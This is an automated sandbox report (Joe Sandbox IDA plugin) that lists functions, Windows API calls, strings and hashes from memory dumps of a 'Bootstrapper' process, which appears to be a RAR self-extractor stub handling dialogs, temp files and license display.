Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 30bfd4af42dd94158f69a21e1f089a9ab7c1ba61e2222caacbacfd0b023ffdb7
Instruction ID: df85b64624eaf8c49653e2ef43206481c997da8cc5ee8b305a20fbae6d779597
Opcode Fuzzy Hash: 30bfd4af42dd94158f69a21e1f089a9ab7c1ba61e2222caacbacfd0b023ffdb7
Instruction Fuzzy Hash: 8241C5B1D08348AAEB30E7709C86FEEB7AC9F04304F046555FA95B61C2D674BAC8C761

Function 00E1B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370

EndDialog.USER32(?,00000001), ref: 00E1B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00E1B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00E1B650
SetWindowTextW.USER32(?,?), ref: 00E1B661
GetDlgItem.USER32(?,00000065), ref: 00E1B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00E1B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00E1B694

Strings

LICENSEDLG, xrefs: 00E1B5D4

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: a1ef4713055d87aae591684c473f6668192b1f025017efb01c02ac2660f4e084
Instruction ID: e08a5b9f81b4768370f3b583978824f2f69402c97ea686c543473e24985daf3e
Opcode Fuzzy Hash: a1ef4713055d87aae591684c473f6668192b1f025017efb01c02ac2660f4e084
Instruction Fuzzy Hash: F621E532604204BFD211AF77FD4AFBB3B6DEB56B85F011014F601B60A1CBA2A9499635

Function 00E1FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,23F5BF75,00000001,00000000,00000000,?,?,00E0AF6C,ROOT\CIMV2), ref: 00E1FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00E0AF6C,ROOT\CIMV2), ref: 00E1FE14
SysAllocString.OLEAUT32(00000000), ref: 00E1FE1F
_com_issue_error.COMSUPP ref: 00E1FE48
_com_issue_error.COMSUPP ref: 00E1FE52
GetLastError.KERNEL32(80070057,23F5BF75,00000001,00000000,00000000,?,?,00E0AF6C,ROOT\CIMV2), ref: 00E1FE57
_com_issue_error.COMSUPP ref: 00E1FE6A
GetLastError.KERNEL32(00000000,?,?,00E0AF6C,ROOT\CIMV2), ref: 00E1FE80
_com_issue_error.COMSUPP ref: 00E1FE93

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: fb9e668b4c61e7ed6ebbc50f317dc509f088b4702a079e60513c8cd46c474cde
Instruction ID: f6afa4ecca403ae820c4f01a7835216c9ea75e5934949881facadce4e02c2871
Opcode Fuzzy Hash: fb9e668b4c61e7ed6ebbc50f317dc509f088b4702a079e60513c8cd46c474cde
Instruction Fuzzy Hash: DA41F871A00219AFCB109F65DC49BEEBBE8EB44724F105239F905F7291D7349984CBE4

Function 00E09382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E09387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00E093AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00E093C9

Part of subcall function 00E0C29A: _wcslen.LIBCMT ref: 00E0C2A2

Part of subcall function 00E11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E0C116,00000000,.exe,?,?,00000800,?,?,?,00E18E3C), ref: 00E11FD1

_swprintf.LIBCMT ref: 00E09465

Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5

MoveFileW.KERNEL32(?,?), ref: 00E094D4
MoveFileW.KERNEL32(?,?), ref: 00E09514

Strings

rtmp%d, xrefs: 00E0944E

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 4c4553c03c86cbbf068217e35ded51cc079b1d8031a486a7f24558eb6933296e
Instruction ID: 2e640fd0ef8504aea6f2e957da88a6b7c981b645d311ecbc0f2e96b41db5f55a
Opcode Fuzzy Hash: 4c4553c03c86cbbf068217e35ded51cc079b1d8031a486a7f24558eb6933296e
Instruction Fuzzy Hash: 364154B1900258A6DF21AFA1CC45EDE73BCEF45344F0458A5B649F3093DB388BC99B60

Function 00E01100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E0112B
_wcslen.LIBCMT ref: 00E01153
_wcslen.LIBCMT ref: 00E01182
_wcslen.LIBCMT ref: 00E011A9

Strings

p, xrefs: 00E01205, 00E01233
U, xrefs: 00E0120D, 00E0123B
z, xrefs: 00E01219

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcslen
String ID: U$p$z
API String ID: 176396367-3999876168
Opcode ID: 1300c9ad49476d5346b3395a036512ec874da20628efe7bbdc45f618e97bdeea
Instruction ID: 025529ee7e44960707c79f1086fe0f52c6e488a5ba15bdb76846159cdd503367
Opcode Fuzzy Hash: 1300c9ad49476d5346b3395a036512ec874da20628efe7bbdc45f618e97bdeea
Instruction Fuzzy Hash: CD41D8719006699FCB219F789C099DF7BB8EF01350F040059FD45F7256DB74AE898BA1

Function 00E19ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00E19EEE
GetWindowRect.USER32(?,00000000), ref: 00E19F44
ShowWindow.USER32(?,00000005,00000000), ref: 00E19FDB
SetWindowTextW.USER32(?,00000000), ref: 00E19FE3
ShowWindow.USER32(00000000,00000005), ref: 00E19FF9

Strings

RarHtmlClassName, xrefs: 00E19FA5
, xrefs: 00E19F52, 00E19F87

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Window$Show$RectText
String ID: $RarHtmlClassName
API String ID: 3937224194-266247588
Opcode ID: c577e0c323e4e78d491d82c6405b56c0ccad4de26bc4dcffb976d892c43da359
Instruction ID: dbb31464e685415b460fca9befd0b4cf451abf005c2daf7638936bb28ffcc558
Opcode Fuzzy Hash: c577e0c323e4e78d491d82c6405b56c0ccad4de26bc4dcffb976d892c43da359
Instruction Fuzzy Hash: CB41FF32105310AFCB215F75AC48BABBBA8FF49785F045568F849BA053CB74DA89CB61

Function 00E11218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00E1122E

Part of subcall function 00E0B146: GetVersionExW.KERNEL32(?), ref: 00E0B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00E11251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00E11263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00E11274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00E11284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00E11294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00E112CF
__aullrem.LIBCMT ref: 00E11379

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 6b165fedf88ccc3fdab2ce3e1e9147c075609d8e31c03c1718015a2bfdff9951
Instruction ID: a209a5dd2250934684e1d2d0bf034b80fdbd6558f9c510e64afa3f176c4fb532
Opcode Fuzzy Hash: 6b165fedf88ccc3fdab2ce3e1e9147c075609d8e31c03c1718015a2bfdff9951
Instruction Fuzzy Hash: 734109B1508305AFC710DF65C8849ABBBF9FF88314F00992EF596D2650E738E649CB52

Function 00E02210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00E02536

Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5

Part of subcall function 00E105DA: _wcslen.LIBCMT ref: 00E105E0

Strings

x%u, xrefs: 00E026FD
xc%u, xrefs: 00E0275A
;%u, xrefs: 00E02523

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: d6a4c40862bf0d822a9c633abf7defa086a2368446c1ae517b59e84107f13c0f
Instruction ID: 7f1ce6a08698f557d89f07f0830eab1e3654342b264d9d851b97681f11fd01d6
Opcode Fuzzy Hash: d6a4c40862bf0d822a9c633abf7defa086a2368446c1ae517b59e84107f13c0f
Instruction Fuzzy Hash: 8EF106706043409BDB15DB24C4D9BEE77D99B94304F08666DEE8ABB2C3CB6489C5C762

Function 00E19CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E19D0A

Strings

</p>, xrefs: 00E19DE8
<style>, xrefs: 00E19E30
</style>, xrefs: 00E19E52
<br>, xrefs: 00E19DFE
>, xrefs: 00E19D4B

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 9c89580defa3df769baa6e08f2ad4e35e275bc023303455351f4f4900a2f8ee3
Instruction ID: 11749c42ec30045879fc6a00842b4bd43a89b872b7f9575dea3f447eb8b5d52e
Opcode Fuzzy Hash: 9c89580defa3df769baa6e08f2ad4e35e275bc023303455351f4f4900a2f8ee3
Instruction Fuzzy Hash: 54512C7674032395DB309A25E8317F673E0EFA1754F59241AF9C1BB1C2FB658CC18261

Function 00E2F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00E2FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00E2F6CF
__fassign.LIBCMT ref: 00E2F74A
__fassign.LIBCMT ref: 00E2F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00E2F78B
WriteFile.KERNEL32(?,00000000,00000000,00E2FE02,00000000,?,?,?,?,?,?,?,?,?,00E2FE02,00000000), ref: 00E2F7AA
WriteFile.KERNEL32(?,00000000,00000001,00E2FE02,00000000,?,?,?,?,?,?,?,?,?,00E2FE02,00000000), ref: 00E2F7E3

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 45c0e834a69cf5c796e44be6140a395d60a2b7b0db3331aa7a410bc74b8ce495
Instruction ID: 35331832bbfb9253dc18ced57c065d52847b663d2c169a9a98e9c424eba2a62b
Opcode Fuzzy Hash: 45c0e834a69cf5c796e44be6140a395d60a2b7b0db3331aa7a410bc74b8ce495
Instruction Fuzzy Hash: 9E5182B1D002599FCB14CFA8EC85AEEFBF4EF09300F14516AE555F7251E670AA45CBA0

Function 00E1CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00E1CE9D

Part of subcall function 00E0B690: _wcslen.LIBCMT ref: 00E0B696

_swprintf.LIBCMT ref: 00E1CED1

Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5

SetDlgItemTextW.USER32(?,00000066,00E4946A), ref: 00E1CEF1
_wcschr.LIBVCRUNTIME ref: 00E1CF22
EndDialog.USER32(?,00000001), ref: 00E1CFFE

Strings

%s%s%u, xrefs: 00E1CEC6

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
String ID: %s%s%u
API String ID: 689974011-1360425832
Opcode ID: 3af83fdd54b21e0447a9d6a2c3a0304b49aa2b661fea112a348240d8e2b47e9a
Instruction ID: 7c5c3480be94be314ff6b5af973987cee2843adf733430c625e8ad23d3b78785
Opcode Fuzzy Hash: 3af83fdd54b21e0447a9d6a2c3a0304b49aa2b661fea112a348240d8e2b47e9a
Instruction Fuzzy Hash: F64191B1940658AADF219B60DC45FEE77FDEB05344F4090A6FA09F7081EAB48AC5CF61

Function 00E22900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00E22937
___except_validate_context_record.LIBVCRUNTIME ref: 00E2293F
_ValidateLocalCookies.LIBCMT ref: 00E229C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00E229F3
_ValidateLocalCookies.LIBCMT ref: 00E22A48

Strings

csm, xrefs: 00E229DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 00b73b5a4b8d303694ffaa39bf82c4c3e4810c0a4b282de78916e4ee97337849
Instruction ID: 3c59429e2cb994c311667c93e361b7ffd4aac7c9e22e07167b35b483c5c56020
Opcode Fuzzy Hash: 00b73b5a4b8d303694ffaa39bf82c4c3e4810c0a4b282de78916e4ee97337849
Instruction Fuzzy Hash: F441C034A00228AFCF14DF28D885A9EBFF1AF45328F149069E915BB392D731DA45CF90

Function 00E19955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E1995E
_wcslen.LIBCMT ref: 00E19993

Strings

, xrefs: 00E199B0
 , xrefs: 00E19A21
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00E19987
<br>, xrefs: 00E199DF

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 33609e23a185d266a4411e851d87cd739af326cea60f9166264951c0b87dbf22
Instruction ID: 9a2cdcfd5078d1f8860e6abed9217e889dc584e6fcb0bf3eade6ead46dca5158
Opcode Fuzzy Hash: 33609e23a185d266a4411e851d87cd739af326cea60f9166264951c0b87dbf22
Instruction Fuzzy Hash: 2631693264434556DA30AF90AC12BFA73E4EF80724F60541EF482772C2FA64AEC883A1

Function 00E2C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E2C868: _free.LIBCMT ref: 00E2C891

_free.LIBCMT ref: 00E2C8F2

Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4

_free.LIBCMT ref: 00E2C8FD
_free.LIBCMT ref: 00E2C908
_free.LIBCMT ref: 00E2C95C
_free.LIBCMT ref: 00E2C967
_free.LIBCMT ref: 00E2C972
_free.LIBCMT ref: 00E2C97D

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: a9be902c44ff4dd9274e1a59d483c16c503f3629d3a33e56d24692b1c580f07a
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 6A111F71581B24AAE528B7B1EC07FCF7BEC9F04B00F609C15F29D760A2DA65B5098B50

Function 00E1E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00E1E669,00E1E5CC,00E1E86D), ref: 00E1E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E1E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E1E630

Strings

KERNEL32.DLL, xrefs: 00E1E600
ReleaseSRWLockExclusive, xrefs: 00E1E625
AcquireSRWLockExclusive, xrefs: 00E1E615

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: af639583ce4e39bf19a3f8e2ddf72df6f532165c3d50961faee58d9bdba31a0d
Instruction ID: 9a5024385057652fe3c5d7c89fa7e11a9525539ab9fbb3f8945d621e4492307b
Opcode Fuzzy Hash: af639583ce4e39bf19a3f8e2ddf72df6f532165c3d50961faee58d9bdba31a0d
